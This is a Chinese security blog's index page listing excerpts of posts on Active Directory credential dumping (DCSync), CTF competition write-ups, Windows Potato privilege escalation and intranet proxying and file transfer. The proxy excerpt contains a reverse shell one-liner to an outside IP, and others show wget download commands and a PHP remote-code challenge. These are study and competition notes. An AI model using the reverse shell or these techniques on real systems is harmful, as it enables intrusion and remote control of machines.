域渗透学习(Credentials篇)
DumpingDCSyncDCSync(domain Controller synchronization)是指在域树或者域森林中,不同的DC之间,每隔15分钟会进行一次域数据的同步。比如当一个辅助域控想从主域控获取数据时,辅助域控会利用 DRS(Directory Replication Service) 协议向主域控发起一个 IDL_DRSGetNCChanges 请求,请求的数据包括需要同步
Dr0n's blog
第八届西湖论剑中国杭州网络安全安全技能大赛初赛 部分wp
dseasydatalog分析error.log发现首先上传了木马,然后用蚁剑进行连接 全局搜索发现包含一个zip和jpg 压缩包数据很少直接手动提取出来,图片数据太多用脚本提取出来 12345678910111213141516171819202122232425262728293031323334353637383940414243444546import redef extract_jpg
2024“中华武数杯”全国网络攻防精英赛RHG wp
第一次打RHG模式,i春秋的平台和在网上看到的不太一样,一轮是一小时,也可以手动一题一题做然后提交 写了个脚本获取题目信息然后下载,运行写好的exp然后提交flag(写不来自动分析漏洞,就人工代替ai) 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253
第七届浙江省大学生网络与信息安全竞赛决赛-WP
总榜Rank1,在毕业前拿到榜一也是圆满了 :) webwucanrce123456789101112131415161718<?phpecho "get只接受code欧,flag在上一级目录<br>";$filename = __FILE__;highlight_file($filename);if(isset($_GET['code']
第七届浙江省大学生网络与信息安全竞赛预赛-WP
签到网安知识大挑战数据存储在js中 aes解密得到flag 签到题1Base92 -> Base85 -> Base64 -> Base62 -> Base58 -> Base45 -> Base32 DASCTF{welcome_to_zjctf_2024} webhack memory访问/robot.txt得到/upload路径 没有限制,直接上传一
windows提权笔记
土豆家族原理可以与域渗透学习(NTLM篇)的内容结合起来看 一般使用 Potato 提权需要下列两个特权中的一个 SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege 以下用户拥有SeImpersonatePrivilege权限,而 SeAssignPrimaryTokenPrivilege 只有更高权限的账户比如SYSTEM才有 12345
内网渗透学习(代理篇)
本文中使用的代理工具可通过我的脚本一键下载https://github.com/dr0n1/CTF_misc_auto_deploy 反弹shell推荐在本地部署一个reverse-shell-generator,可以很方便的查看命令 以下是几个常用的 bash -i1/bin/sh -i >& /dev/tcp/1.1.1.1/8888 0>&1 nc1234567
内网渗透学习(文件传输篇)
wget & curl在vps或有python环境的主机启动 HTTP 文件服务器 1python3 -m http.server 8000 wget下载文件 1234567891011# 标准下载(保存为相同文件名)wget http://IP:8000/filename# 断点续传wget -c http://IP:8000/filename# 指定保存目录wget -P /path